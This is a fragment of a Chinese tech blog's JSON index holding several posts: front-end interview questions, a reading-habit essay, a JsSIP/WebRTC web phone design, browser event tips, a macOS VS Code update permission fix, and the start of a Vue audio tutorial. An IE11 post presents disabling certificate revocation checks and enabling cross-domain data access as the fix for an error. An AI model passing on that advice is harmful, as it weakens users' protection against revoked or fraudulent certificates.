1.1.2. script, script async和script defer之间有什么区别? 1.1.3. cookie, sessionStorage 和 localStorage之间有什么区别? 1.1.4. 用过哪些html模板渲染工具? 1.2. CSS相关 1.2.1. 简述CSS盒子模型 1.2.2. CSS有哪些选择器? 1.2.3. CSS sprite是什么? 1.2.4. 写一下你知道的前端UI框架? 1.3. JS相关 1.3.1. js有哪些数据类型? 1.3.2. js有哪些假值? 1.3.3. js数字和字符串之间有什么快速转换的写法? 1.3.4. 经常使用哪些ES6的语法? 1.3.5. 什么是同源策略? 1.3.6. 跨域有哪些解决方法? 1.3.7. 网页进度条实现的原理 1.3.8. 请问console.log是同步的,还是异步的? 1.3.9. 下面console输出的值是什么? var scores = [10,11,12]; var total = 0; for(var score in scores){ total += score; } var average = total/scores.length; console.log(average); 1.3.10. 请问下面的写法问题在哪? 
console.log(1) (function(){ console.log(1) })() 1.3.11. 请问s.length是多少,s[2]是多少 var s = [] s[3] = 4 s.length ? s[2] ? 1.3.12. 说说你对setTimeout的深入理解? setTimeout(function(){ console.log(\u0026#39;hi\u0026#39;) }, 1000) 1.3.13. 解释闭包概念及其作用 1.3.14. 如何理解js 函数first class的概念? 1.3.15. 函数有哪些调用方式?不同this的会指向哪里? 1.3.16. applly和call有什么区别? 1.3.17. 函数的length属性的代表什么? 1.3.18. 有用过哪些js编程风格 1.3.19. 如何理解EventLoop? 1.3.20. 使用过哪些构建工具?各有什么优缺点? 1.4. 其它 1.4.1. 平时使用什么搜索引擎查资料? 1.4.2. 对翻墙有什么看法?如何翻墙? 1.4.3. 个人有没有技术博客,地址是什么? 1.4.4. github上有没有项目? 1.5. 网络相关 1.5.1. 请求状态码 1xx,2xx,3xx,4xx,5xx分别有什么含义? 1.5.2. 发送某些post请求时,有时会多一些options请求,请问这是为什么? 1.5.3. http报文有哪些组成部分? 1.5.4. http端到端首部和逐跳首部有什么区别? 1.5.5. http与https在同时使用时,有什么注意点? 1.5.6. http, tcp, udp, websocket,分别位于7层网络的那一层?tcp和udp有什么不同? 2. 编码题 2.1. 写一个函数,返回一个数组中所有元素被第一个元素除后的结果 2.2. 写一个函数,来判断变量是否是数组,至少使用两种写法 2.3. 写一个函数,将秒转化成时分秒格式,如80转化成:00:01:20 写一个函数,将对象中属性值为\u0026rsquo;\u0026rsquo;, undefined, null的属性删除掉 // 处理前 var obj = { name: \u0026#39;wdd\u0026#39;, address: { code: \u0026#39;\u0026#39;, tt: null, age: 1 }, ss: [], vv: undefined } // 处理后 { name: \u0026#39;wdd\u0026#39;, address: { age: 1 }, ss: [] } 3. 翻译题 Aggregation operations process data records and return computed results. Aggregation operations group values from multiple documents together, and can perform a variety of operations on the grouped data to return a single result. MongoDB provides three ways to perform aggregation: the aggregation pipeline, the map-reduce function, and single purpose aggregation methods.\n","permalink":"https://wdd.js.org/posts/2018/02/front-end-interview-handbook/","summary":"1. 问答题 1.1. HTML相关 1.1.1. 的作用是什么? 1.1.2. script, script async和script defer之间有什么区别? 1.1.3. cookie, sessionStorage 和 localStorage之间有什么区别? 1.1.4. 用过哪些html模板渲染工具? 1.2. CSS相关 1.2.1. 简述CSS盒子模型 1.2.2. CSS有哪些选择器? 1.2.3. CSS sprite是什么? 1.2.4. 写一下你知道的前端UI框架? 1.3. JS相关 1.3.1. js有哪些数据类型? 1.3.2. js有哪些假值? 1.3.3. js数字和字符串之间有什么快速转换的写法? 1.3.4. 经常使用哪些ES6的语法? 1.3.5. 什么是同源策略? 1.3.6. 跨域有哪些解决方法? 1.3.7. 
网页进度条实现的原理 1.3.8. 请问console.log是同步的,还是异步的? 1.3.9. 下面console输出的值是什么? var scores = [10,11,12]; var total = 0; for(var score in scores){ total += score; } var average = total/scores.length; console.log(average); 1.","title":"前端面试和笔试题目"},{"content":"床底下秘密 我是一个毅力不是很够的人。我曾经下定决心要锻炼身体,买了一些健身器材,例如瑜伽垫,仰卧起坐的器材,俯卧撑的器材。然而三分钟的热度过后,我把瑜伽垫卷了起来,塞到床底下。把仰卧起坐的器材拆开,也塞到了床底下。\n所以每次我都不敢看床底下,那里塞满了我的羞愧。我常常想,我这不就是永远睡在羞愧之上吗?\n那么,是什么让我放弃了自己的目标,慢慢活成了自己讨厌的样子呢?\n之前和朋友聊天,我们有一段时间没见了。我突然觉得他也太能聊了,说了很多我不知道的新鲜事,还有一些可以让人茅塞顿开的想法。完了之后,他劝我让我多读书。我觉得这个想法很多。我是确实需要读书了。毕竟我的床底下已经没有空间再塞其他的东西了。\n于是我在多看阅读上买了一下电子书,在京东上买了一些实体书,然后又买了一个kindle。在读书的过程中,有时候作者也会推荐你看一些其他的书。我给自己定了2018年我的阅读计划,给自己定下要看哪些书。\n看书的方法 当我决定要看书,并且为此付出了不少的金钱的情况下。我是非常不愿因让我的金钱的付出白白打水漂的,毕竟买书以及买设备,这不是免费的服务。于是我给自己指定了一个非常完善的定量阅读标准\n读书方法v1.0.0 版 如下\n每天至少看三本书 每本书看50页 人要有标准才能判断是否达标,没有标准,没有数字化的支撑,那是很难以持续的。比如说中国的菜谱,做某道菜中写了一句:加入少许盐。中国人看了会想,那我就按照口味随便加点盐吧。外国人就会被搞得非常迷糊,少许是多少克盐? 20g, 30g? 完全没有标准嘛。\n按照读书方法 v1.0.0版,我看了几天,这个效果是很好的。但是我很累,电子书50页可不是个小数目。有时候很难完成的。于是我必须要升级我的读书方法。\n读书方法v1.0.1 版 如下\n每天至少看三本书 每本书看10页 按照读书方法v1.0.1 版,我看了几天,虽然读书的进度很慢,但是我很容易有满足感,因为这个目标是很容易就达成的。因为你随便去上个厕所,看个10页电子书也是绰绰有余的。但是这个版本也有个问题。\n如果我今天看的这本书看的流连忘返,一不小心忘记看页码了,居然不知不觉读了38页,那么是不是已经消耗了未来几天的阅读量呢,明天这本书要不要度呢? 
所以,我要升级我的读书方法。\n读书方法v1.0.2版:\n每天至少读三本书 每本书至少读10页 我按照这个方法,感觉做的不错。每天都有一定的阅读量要看,而且阅读量不是很大,不会让我觉得很累。而且当我完成了这个目标,我是会获得不小的满足感。\n大目标分解成小目标去逐个击破,这是我这篇文章的核心观点。\n冲量公式 I = F x T 冲量是力的时间累积效应的量度,是矢量。如果物体所受的力是大小和方向都不变的恒力F,冲量I就是F和作用时间t的乘积。 冲量是描述力对物体作用的时间累积效应的物理量。力的冲量是一个过程量。在谈及冲量时,必须明确是哪个力在哪段时间上的冲量。\n个人好习惯的养成,不是一蹴而就的,而是类似于物理学冲量的概念:力在一段时间内的累积,是过程量\n三分钟的热度对应的冲量:I = F_max x T_min。使用很大的力,作用时间超短,基本上没啥效果,冲量趋近于零。\n微习惯对应的冲量:I = F_min x T_max。使用很小的力,做长时间的积累。冲量不会趋近于零,而是会慢慢增长,然后趋近于一个稳定水平。比如你给自己规定每天看1页书,但是大多数情况下,如果你做了看书的动作,基本上你看书的页数一定会大于1页。\n看什么样的书 我自己喜欢看计算机,心理学,历史人文方面的出版书籍。而我的选择标准有两个,符合任一一个,我都会去看。\n要有用。无论是对我的专业知识,还是对人际交往,金融理财等方面要用有益之处 要有趣。没趣的书我是断然不会去看的。 读书实际上是读人,一流作家写的一流的书,三流作家只能写出九流的书。\n","permalink":"https://wdd.js.org/posts/2018/02/small-is-better-than-big/","summary":"床底下秘密 我是一个毅力不是很够的人。我曾经下定决心要锻炼身体,买了一些健身器材,例如瑜伽垫,仰卧起坐的器材,俯卧撑的器材。然而三分钟的热度过后,我把瑜伽垫卷了起来,塞到床底下。把仰卧起坐的器材拆开,也塞到了床底下。\n所以每次我都不敢看床底下,那里塞满了我的羞愧。我常常想,我这不就是永远睡在羞愧之上吗?\n那么,是什么让我放弃了自己的目标,慢慢活成了自己讨厌的样子呢?\n之前和朋友聊天,我们有一段时间没见了。我突然觉得他也太能聊了,说了很多我不知道的新鲜事,还有一些可以让人茅塞顿开的想法。完了之后,他劝我让我多读书。我觉得这个想法很多。我是确实需要读书了。毕竟我的床底下已经没有空间再塞其他的东西了。\n于是我在多看阅读上买了一下电子书,在京东上买了一些实体书,然后又买了一个kindle。在读书的过程中,有时候作者也会推荐你看一些其他的书。我给自己定了2018年我的阅读计划,给自己定下要看哪些书。\n看书的方法 当我决定要看书,并且为此付出了不少的金钱的情况下。我是非常不愿因让我的金钱的付出白白打水漂的,毕竟买书以及买设备,这不是免费的服务。于是我给自己指定了一个非常完善的定量阅读标准\n读书方法v1.0.0 版 如下\n每天至少看三本书 每本书看50页 人要有标准才能判断是否达标,没有标准,没有数字化的支撑,那是很难以持续的。比如说中国的菜谱,做某道菜中写了一句:加入少许盐。中国人看了会想,那我就按照口味随便加点盐吧。外国人就会被搞得非常迷糊,少许是多少克盐? 20g, 30g? 完全没有标准嘛。\n按照读书方法 v1.0.0版,我看了几天,这个效果是很好的。但是我很累,电子书50页可不是个小数目。有时候很难完成的。于是我必须要升级我的读书方法。\n读书方法v1.0.1 版 如下\n每天至少看三本书 每本书看10页 按照读书方法v1.0.1 版,我看了几天,虽然读书的进度很慢,但是我很容易有满足感,因为这个目标是很容易就达成的。因为你随便去上个厕所,看个10页电子书也是绰绰有余的。但是这个版本也有个问题。\n如果我今天看的这本书看的流连忘返,一不小心忘记看页码了,居然不知不觉读了38页,那么是不是已经消耗了未来几天的阅读量呢,明天这本书要不要度呢? 
所以,我要升级我的读书方法。\n读书方法v1.0.2版:\n每天至少读三本书 每本书至少读10页 我按照这个方法,感觉做的不错。每天都有一定的阅读量要看,而且阅读量不是很大,不会让我觉得很累。而且当我完成了这个目标,我是会获得不小的满足感。\n大目标分解成小目标去逐个击破,这是我这篇文章的核心观点。\n冲量公式 I = F x T 冲量是力的时间累积效应的量度,是矢量。如果物体所受的力是大小和方向都不变的恒力F,冲量I就是F和作用时间t的乘积。 冲量是描述力对物体作用的时间累积效应的物理量。力的冲量是一个过程量。在谈及冲量时,必须明确是哪个力在哪段时间上的冲量。\n个人好习惯的养成,不是一蹴而就的,而是类似于物理学冲量的概念:力在一段时间内的累积,是过程量\n三分钟的热度对应的冲量:I = F_max x T_min。使用很大的力,作用时间超短,基本上没啥效果,冲量趋近于零。\n微习惯对应的冲量:I = F_min x T_max。使用很小的力,做长时间的积累。冲量不会趋近于零,而是会慢慢增长,然后趋近于一个稳定水平。比如你给自己规定每天看1页书,但是大多数情况下,如果你做了看书的动作,基本上你看书的页数一定会大于1页。\n看什么样的书 我自己喜欢看计算机,心理学,历史人文方面的出版书籍。而我的选择标准有两个,符合任一一个,我都会去看。\n要有用。无论是对我的专业知识,还是对人际交往,金融理财等方面要用有益之处 要有趣。没趣的书我是断然不会去看的。 读书实际上是读人,一流作家写的一流的书,三流作家只能写出九流的书。","title":"small is better than big 我的读书方法论"},{"content":"0 阅前须知 本文并不是教程,只是实现方案 我只是从WEB端考虑这个问题,实际还需要后端sip服务器的配合 jsSIP有个非常不错的在线demo, 可以去哪里玩耍,很好玩呢 try jssip 1. 技术简介 WebRTC: WebRTC,名称源自网页即时通信(英语:Web Real-Time Communication)的缩写,是一个支持网页浏览器进行实时语音对话或视频对话的API。它于2011年6月1日开源并在Google、Mozilla、Opera支持下被纳入万维网联盟的W3C推荐标准 SIP: 会话发起协议(Session Initiation Protocol,缩写SIP)是一个由IETF MMUSIC工作组开发的协议,作为标准被提议用于创建,修改和终止包括视频,语音,即时通信,在线游戏和虚拟现实等多种多媒体元素在内的交互式用户会话。2000年11月,SIP被正式批准成为3GPP信号协议之一,并成为IMS体系结构的一个永久单元。SIP与H.323一样,是用于VoIP最主要的信令协议之一。 一般来说,要么使用实体话机,要么在系统上安装基于sip的客户端程序。实体话机硬件成本高,基于sip的客户端往往兼容性差,无法跨平台,易被杀毒软件查杀。\n而WebRTC或许是更好的解决方案,只要一个浏览器就可以实时语音视频通话,这是很不错的解决方案。WebSocket可以用来传递sip信令,而WebRTC用来实时传输语音视频流。\n2. 
前端WebRTC实现方案 其实我们不需要去自己处理WebRTC的相关方法,或者去处理视频或者媒体流。市面上已经有不错的模块可供选择。\n2.1 jsSIP jsSIP是JavaScript SIP 库\n功能特点如下:\n可以在浏览器或者Nodejs中运行 使用WebSocket传递SIP协议 视频音频实时消息使用WebRTC 非常轻量 100%纯JavaScript 使用简单并且具有强大的Api 服务端支持 OverSIP, Kamailio, Asterisk, OfficeSIP,reSIProcate,Frafos ABC SBC,TekSIP 是RFC 7118 and OverSIP的作者写的 下面是使用JsSIP打电话的例子,非常简单吧\n// Create our JsSIP instance and run it: var socket = new JsSIP.WebSocketInterface(\u0026#39;wss://sip.myhost.com\u0026#39;); var configuration = { sockets : [ socket ], uri : \u0026#39;sip:alice@example.com\u0026#39;, password : \u0026#39;superpassword\u0026#39; }; var ua = new JsSIP.UA(configuration); ua.start(); // Register callbacks to desired call events var eventHandlers = { \u0026#39;progress\u0026#39;: function(e) { console.log(\u0026#39;call is in progress\u0026#39;); }, \u0026#39;failed\u0026#39;: function(e) { console.log(\u0026#39;call failed with cause: \u0026#39;+ e.data.cause); }, \u0026#39;ended\u0026#39;: function(e) { console.log(\u0026#39;call ended with cause: \u0026#39;+ e.data.cause); }, \u0026#39;confirmed\u0026#39;: function(e) { console.log(\u0026#39;call confirmed\u0026#39;); } }; var options = { \u0026#39;eventHandlers\u0026#39; : eventHandlers, \u0026#39;mediaConstraints\u0026#39; : { \u0026#39;audio\u0026#39;: true, \u0026#39;video\u0026#39;: true } }; var session = ua.call(\u0026#39;sip:bob@example.com\u0026#39;, options); 2.2 SIP.js sip.js项目实际是fork自jsSIP的,这里主要介绍它的服务端支持情况。其他接口自己自行查阅\nFreeSWITCH Asterisk OnSIP FreeSWITCH Legacy 3. 
平台考量 由于WebRTC对浏览器有较高的要求,你可以看看下图,哪些浏览器支持WebRTC, 所有IE浏览器都不行,chrome系支持情况不错。\n3.1 考量标准 跨平台 兼容性 体积 集成性 硬件要求 开发成本 3.2 考量表格 种类 适用平台 优点 缺点 基于electron开发的桌面客户端 window, mac, linux 跨平台,兼容好 要下载安装,体积大(压缩后至少48MB),对电脑性能有要求 开发js sdk 现代浏览器 体积小,容易第三方集成 兼容差(因为涉及到webRTC, IE11以及以都不行,对宿主环境要求高),客户集成需要开发量 开发谷歌浏览器扩展 谷歌浏览器 体积小 兼容差(仅限类chrome浏览器) 4 参考文档 and 延伸阅读 and 动手实践 Js SIP Getting Started 120行代码实现 浏览器WebRTC视频聊天 SIP协议状态码: 5 常见问题 422: \u0026ldquo;Session Interval Too Small\u0026rdquo; jsSIP默认携带Session-Expires: 90的头部信息,如果这个超时字段小于服务端的设定值,那么就会得到如下422的响应。参见SIP协议状态码:, 可以在call请求中设置sessionTimersExpires, 使其超过服务端的设定值即可\ncall(targer, options ) option.sessionTimersExpires Number (in seconds) for the default Session Timers interval (default value is 90, do not set a lower value). 6 最后,你我共勉 ","permalink":"https://wdd.js.org/posts/2018/02/webrtc-web-sip-phone/","summary":"0 阅前须知 本文并不是教程,只是实现方案 我只是从WEB端考虑这个问题,实际还需要后端sip服务器的配合 jsSIP有个非常不错的在线demo, 可以去哪里玩耍,很好玩呢 try jssip 1. 技术简介 WebRTC: WebRTC,名称源自网页即时通信(英语:Web Real-Time Communication)的缩写,是一个支持网页浏览器进行实时语音对话或视频对话的API。它于2011年6月1日开源并在Google、Mozilla、Opera支持下被纳入万维网联盟的W3C推荐标准 SIP: 会话发起协议(Session Initiation Protocol,缩写SIP)是一个由IETF MMUSIC工作组开发的协议,作为标准被提议用于创建,修改和终止包括视频,语音,即时通信,在线游戏和虚拟现实等多种多媒体元素在内的交互式用户会话。2000年11月,SIP被正式批准成为3GPP信号协议之一,并成为IMS体系结构的一个永久单元。SIP与H.323一样,是用于VoIP最主要的信令协议之一。 一般来说,要么使用实体话机,要么在系统上安装基于sip的客户端程序。实体话机硬件成本高,基于sip的客户端往往兼容性差,无法跨平台,易被杀毒软件查杀。\n而WebRTC或许是更好的解决方案,只要一个浏览器就可以实时语音视频通话,这是很不错的解决方案。WebSocket可以用来传递sip信令,而WebRTC用来实时传输语音视频流。\n2. 
前端WebRTC实现方案 其实我们不需要去自己处理WebRTC的相关方法,或者去处理视频或者媒体流。市面上已经有不错的模块可供选择。\n2.1 jsSIP jsSIP是JavaScript SIP 库\n功能特点如下:\n可以在浏览器或者Nodejs中运行 使用WebSocket传递SIP协议 视频音频实时消息使用WebRTC 非常轻量 100%纯JavaScript 使用简单并且具有强大的Api 服务端支持 OverSIP, Kamailio, Asterisk, OfficeSIP,reSIProcate,Frafos ABC SBC,TekSIP 是RFC 7118 and OverSIP的作者写的 下面是使用JsSIP打电话的例子,非常简单吧\n// Create our JsSIP instance and run it: var socket = new JsSIP.WebSocketInterface(\u0026#39;wss://sip.myhost.com\u0026#39;); var configuration = { sockets : [ socket ], uri : \u0026#39;sip:alice@example.","title":"基于 WebRTC 构建 Web SIP Phone"},{"content":"1 visibilitychange事件 触发条件:浏览器标签页被隐藏或显示的时候会触发visibilitychange事件.\n使用场景:当标签页显示或者隐藏时,触发一些业务逻辑\ndocument.addEventListener(\u0026#34;visibilitychange\u0026#34;, function() { console.log( document.visibilityState ); }); 2 storage事件 触发条件:使用localStorage or sessionStorage存储或者修改某个本地存储时\n使用场景:标签页间通信\n// AB页面同源 // 在A 页面 window.addEventListener(\u0026#39;storage\u0026#39;, (e) =\u0026gt; {console.log(e)}) // 在B 页面,向120打个电话 localStorage.setItem(\u0026#39;makeCall\u0026#39;,\u0026#39;120\u0026#39;) // 然后可以在A页面间有输出, 可以看出A页面 收到了B页面的通知 ...key: \u0026#34;makeCall\u0026#34;, oldValue: \u0026#34;119\u0026#34;, newValue: \u0026#34;120\u0026#34;, ... 3 beforeunload事件 触发条件:当页面的资源将要卸载(及刷新或者关闭标签页前). 
当页面依然可见,并且该事件可以被取消时\n使用场景:关闭或者刷新页面时弹窗确认,关闭页面时向后端发送报告等\nwindow.addEventListener(\u0026#34;beforeunload\u0026#34;, function (e) { var confirmationMessage = \u0026#34;\\o/\u0026#34;; e.returnValue = confirmationMessage; // Gecko, Trident, Chrome 34+ return confirmationMessage; // Gecko, WebKit, Chrome \u0026lt;34 }); 4 navigator.sendBeacon 这个方法主要用于满足 统计和诊断代码 的需要,这些代码通常尝试在卸载(unload)文档之前向web服务器发送数据。过早的发送数据可能导致错过收集数据的机会。然而, 对于开发者来说保证在文档卸载期间发送数据一直是一个困难。因为用户代理通常会忽略在卸载事件处理器中产生的异步 XMLHttpRequest 。\n使用 sendBeacon() 方法,将会使用户代理在有机会时异步地向服务器发送数据,同时不会延迟页面的卸载或影响下一导航的载入性能。这就解决了提交分析数据时的所有的问题:使它可靠,异步并且不会影响下一页面的加载。此外,代码实际上还要比其他技术简单!\n注意:该方法在IE和safari没有实现\n使用场景:发送崩溃报告\nwindow.addEventListener(\u0026#39;unload\u0026#39;, logData, false); function logData() { navigator.sendBeacon(\u0026#34;/log\u0026#34;, analyticsData); } ","permalink":"https://wdd.js.org/posts/2018/02/useful-browser-events/","summary":"1 visibilitychange事件 触发条件:浏览器标签页被隐藏或显示的时候会触发visibilitychange事件.\n使用场景:当标签页显示或者隐藏时,触发一些业务逻辑\ndocument.addEventListener(\u0026#34;visibilitychange\u0026#34;, function() { console.log( document.visibilityState ); }); 2 storage事件 触发条件:使用localStorage or sessionStorage存储或者修改某个本地存储时\n使用场景:标签页间通信\n// AB页面同源 // 在A 页面 window.addEventListener(\u0026#39;storage\u0026#39;, (e) =\u0026gt; {console.log(e)}) // 在B 页面,向120打个电话 localStorage.setItem(\u0026#39;makeCall\u0026#39;,\u0026#39;120\u0026#39;) // 然后可以在A页面间有输出, 可以看出A页面 收到了B页面的通知 ...key: \u0026#34;makeCall\u0026#34;, oldValue: \u0026#34;119\u0026#34;, newValue: \u0026#34;120\u0026#34;, ... 3 beforeunload事件 触发条件:当页面的资源将要卸载(及刷新或者关闭标签页前). 当页面依然可见,并且该事件可以被取消时\n使用场景:关闭或者刷新页面时弹窗确认,关闭页面时向后端发送报告等\nwindow.addEventListener(\u0026#34;beforeunload\u0026#34;, function (e) { var confirmationMessage = \u0026#34;\\o/\u0026#34;; e.returnValue = confirmationMessage; // Gecko, Trident, Chrome 34+ return confirmationMessage; // Gecko, WebKit, Chrome \u0026lt;34 }); 4 navigator.","title":"不常用却很有妙用的事件及方法"},{"content":"0. 
现象 Could not create temporary directory: Permission denied\n1. 问题起因 在 /Users/username/Library/Caches/目录下,有以下两个文件, 可以看到,他们两个的用户是不一样的,一个是root一个username, 一般来说,我是以username来使用我的mac的。就是因为这两个文件的用户不一样,导致了更新失败。\ndrwxr-xr-x 6 username staff 204B Jan 17 20:33 com.microsoft.VSCode drwxr--r-- 2 root staff 68B Dec 17 13:51 com.microsoft.VSCode.ShipIt 2. 解决方法 注意: 先把vscode 完全关闭\n// 1. 这一步是需要输入密码的 sudo chown $USER ~/Library/Caches/com.microsoft.VSCode.ShipIt/ // 2. 这一步是不需要输入密码的, 如果不进行第一步,第二步会报错 sudo chown $USER ~/Library/Caches/com.microsoft.VSCode.ShipIt/* // 3. 更新xattr xattr -dr com.apple.quarantine /Applications/Visual\\ Studio\\ Code.app 3. 打开vscode Code \u0026gt; Check for Updates, 点击之后,你会发现Check for Updates已经变成灰色了,那么你需要稍等片刻,马上就可以更新,之后会跳出提示,让你重启vscode, 然后重启一下vscode, 就ok了。\n4. 参考 joaomoreno commented on Feb 7, 2017 • edited ","permalink":"https://wdd.js.org/posts/2018/02/mac-vscode-update-permission-denied/","summary":"0. 现象 Could not create temporary directory: Permission denied\n1. 问题起因 在 /Users/username/Library/Caches/目录下,有以下两个文件, 可以看到,他们两个的用户是不一样的,一个是root一个username, 一般来说,我是以username来使用我的mac的。就是因为这两个文件的用户不一样,导致了更新失败。\ndrwxr-xr-x 6 username staff 204B Jan 17 20:33 com.microsoft.VSCode drwxr--r-- 2 root staff 68B Dec 17 13:51 com.microsoft.VSCode.ShipIt 2. 解决方法 注意: 先把vscode 完全关闭\n// 1. 这一步是需要输入密码的 sudo chown $USER ~/Library/Caches/com.microsoft.VSCode.ShipIt/ // 2. 这一步是不需要输入密码的, 如果不进行第一步,第二步会报错 sudo chown $USER ~/Library/Caches/com.microsoft.VSCode.ShipIt/* // 3. 更新xattr xattr -dr com.apple.quarantine /Applications/Visual\\ Studio\\ Code.app 3. 打开vscode Code \u0026gt; Check for Updates, 点击之后,你会发现Check for Updates已经变成灰色了,那么你需要稍等片刻,马上就可以更新,之后会跳出提示,让你重启vscode, 然后重启一下vscode, 就ok了。","title":"mac vscode 更新失败 Permission denied解决办法"},{"content":"一千个IE浏览器访问同一个页面,可能报一千种错误。前端激进派对IE恨得牙痒痒,但是无论你爱,或者不爱,IE就在那里,不来不去。\n一些银行,以及政府部门,往往都是指定必须使用IE浏览器。所以,一些仅在IE浏览器上出现的问题。总结起来问题的原因很简单:IE的配置不正确\n下面就将一个我曾经遇到的问题: IE11 0x2ee4, 以及其他的问题的解决方案\n1. 
IE11 SCRIPT7002: XMLHttpRequest: 网络错误 0x2ee4 背景介绍:在一个HTTPS域向另外一个HTTPS域发送跨域POST请求时\n这个问题在浏览器的输出内容如下,怪异的是,并不是所有IE11都会报这个错误。\nSCRIPT7002: XMLHttpRequest: 网络错误 0x2ee4, 由于出现错误 00002ee4 而导致此项操作无法完成 stackoverflow上有个答案,它的思路是:在post请求发送之前,先进行一次get操作 这个方式我试过,是可行的。但是深层次的原因我不是很明白。\n然而真相总有大白的一天,其实深层次的原因是,IE11的配置。\n去掉检查证书吊销的检查,解决0x2ee4的问题\n解决方法\n去掉check for server certificate revocation*, 也有可能你那边是中文翻译的:叫检查服务器证书是否已吊销 去掉检查发行商证书是否已吊销 点击确定 重启计算机 2 其他常规设置 2.1 去掉兼容模式, 使用Edge文档模式 下图中红色框里的按钮也要取消勾选 2.2 有些使用activeX,还是需要检查是否启用的 2.3 允许跨域 如果你的接口跨域了,还要检查浏览器是否允许跨域,否则浏览器可能默认就禁止跨域的\n设置方法\ninternet选项 安全 自定义级别 启用通过跨域访问数据源 启用跨域浏览窗口和框架 确定 然后重启电脑 ","permalink":"https://wdd.js.org/posts/2018/02/ie11-0x2ee4-bug/","summary":"一千个IE浏览器访问同一个页面,可能报一千种错误。前端激进派对IE恨得牙痒痒,但是无论你爱,或者不爱,IE就在那里,不来不去。\n一些银行,以及政府部门,往往都是指定必须使用IE浏览器。所以,一些仅在IE浏览器上出现的问题。总结起来问题的原因很简单:IE的配置不正确\n下面就讲一个我曾经遇到的问题: IE11 0x2ee4, 以及其他的问题的解决方案\n1. IE11 SCRIPT7002: XMLHttpRequest: 网络错误 0x2ee4 背景介绍:在一个HTTPS域向另外一个HTTPS域发送跨域POST请求时\n这个问题在浏览器的输出内容如下,怪异的是,并不是所有IE11都会报这个错误。\nSCRIPT7002: XMLHttpRequest: 网络错误 0x2ee4, 由于出现错误 00002ee4 而导致此项操作无法完成 stackoverflow上有个答案,它的思路是:在post请求发送之前,先进行一次get操作 这个方式我试过,是可行的。但是深层次的原因我不是很明白。\n然而真相总有大白的一天,其实深层次的原因是,IE11的配置。\n去掉检查证书吊销的检查,解决0x2ee4的问题\n解决方法\n去掉check for server certificate revocation*, 也有可能你那边是中文翻译的:叫检查服务器证书是否已吊销 去掉检查发行商证书是否已吊销 点击确定 重启计算机 2 其他常规设置 2.1 去掉兼容模式, 使用Edge文档模式 下图中红色框里的按钮也要取消勾选 2.2 有些使用activeX,还是需要检查是否启用的 2.3 允许跨域 如果你的接口跨域了,还要检查浏览器是否允许跨域,否则浏览器可能默认就禁止跨域的\n设置方法\ninternet选项 安全 自定义级别 启用通过跨域访问数据源 启用跨域浏览窗口和框架 确定 然后重启电脑 ","title":"IE11 0x2ee4 bug 以及类似问题解决方法"},{"content":"1. 简介 1.1. 相关技术 Vue Vue-cli ElementUI yarn (之前我用npm, 并使用cnpm的源,但是用了yarn之后,我发现它比cnpm的速度还快,功能更好,我就毫不犹豫选择yarn了) Audio相关API和事件 1.2. 从本教程你会学到什么? Vue单文件组件开发知识 Element UI基本用法 Audio原生API及Audio相关事件 音频播放器的基本原理 音频的播放暂停控制 更新音频显示时间 音频进度条控制与跳转 音频音量控制 音频播放速度控制 音频静音控制 音频下载控制 个性化配置与排他性播放 一点点ES6语法 2. 学前准备 基本上不需要什么准备,但是如果你能先看一下Audio相关API和事件将会更好\nAudio: 如果你愿意一层一层剥开我的心 使用 HTML5 音频和视频 3. 在线demo 没有在线demo的教程都是耍流氓\n查看在线demo 项目地址 4. 开始编码 5. 
项目初始化 ➜ test vue init webpack element-audio A newer version of vue-cli is available. latest: 2.9.2 installed: 2.9.1 ? Project name element-audio ? Project description A Vue.js project ? Author wangdd \u0026lt;wangdd@xxxxxx.com\u0026gt; ? Vue build standalone ? Install vue-router? No ? Use ESLint to lint your code? No ? Set up unit tests No ? Setup e2e tests with Nightwatch? No ? Should we run `npm install` for you after the project has been created? (recommended) npm ➜ test cd element-audio ➜ element-audio npm run dev 浏览器打开 http://localhost:8080/, 看到如下界面,说明项目初始化成功\n5.1. 安装ElementUI并插入audio标签 5.1.1. 安装ElementUI yarn add element-ui // or npm i element-ui -S 5.1.2. 在src/main.js中引入Element UI // filename: src/main.js import Vue from \u0026#39;vue\u0026#39; import ElementUI from \u0026#39;element-ui\u0026#39; import App from \u0026#39;./App\u0026#39; import \u0026#39;element-ui/lib/theme-chalk/index.css\u0026#39; Vue.config.productionTip = false Vue.use(ElementUI) /* eslint-disable no-new */ new Vue({ el: \u0026#39;#app\u0026#39;, template: \u0026#39;\u0026lt;App/\u0026gt;\u0026#39;, components: { App } }) 5.1.3. 创建src/components/VueAudio.vue // filename: src/components/VueAudio.vue \u0026lt;template\u0026gt; \u0026lt;div\u0026gt; \u0026lt;audio src=\u0026#34;http://devtest.qiniudn.com/secret base~.mp3\u0026#34; controls=\u0026#34;controls\u0026#34;\u0026gt;\u0026lt;/audio\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;script\u0026gt; export default { data () { return {} } } \u0026lt;/script\u0026gt; \u0026lt;style\u0026gt; \u0026lt;/style\u0026gt; 5.1.4. 
修改src/App.vue, 并引入VueAudio.vue组件 // filename: src/App.vue \u0026lt;template\u0026gt; \u0026lt;div id=\u0026#34;app\u0026#34;\u0026gt; \u0026lt;VueAudio /\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;script\u0026gt; import VueAudio from \u0026#39;./components/VueAudio\u0026#39; export default { name: \u0026#39;app\u0026#39;, components: { VueAudio }, data () { return {} } } \u0026lt;/script\u0026gt; \u0026lt;style\u0026gt; \u0026lt;/style\u0026gt; 打开:http://localhost:8080/,你应该能看到如下效果,说明引入成功,你可以点击播放按钮看看,音频是否能够播放 5.2. 音频的播放暂停控制 我们需要用一个按钮去控制音频的播放与暂停,这里调用了audio的两个api,以及两个事件\naudio.play() audio.pause() play事件 pause事件 修改src/components/VueAudio.vue\n// filename: src/components/VueAudio.vue \u0026lt;template\u0026gt; \u0026lt;div\u0026gt; \u0026lt;!-- 此处的ref属性,可以很方便的在vue组件中通过 this.$refs.audio获取该dom元素 --\u0026gt; \u0026lt;audio ref=\u0026#34;audio\u0026#34; @pause=\u0026#34;onPause\u0026#34; @play=\u0026#34;onPlay\u0026#34; src=\u0026#34;http://devtest.qiniudn.com/secret base~.mp3\u0026#34; controls=\u0026#34;controls\u0026#34;\u0026gt;\u0026lt;/audio\u0026gt; \u0026lt;!-- 音频播放控件 --\u0026gt; \u0026lt;div\u0026gt; \u0026lt;el-button type=\u0026#34;text\u0026#34; @click=\u0026#34;startPlayOrPause\u0026#34;\u0026gt;{{audio.playing | transPlayPause}}\u0026lt;/el-button\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/template\u0026gt; 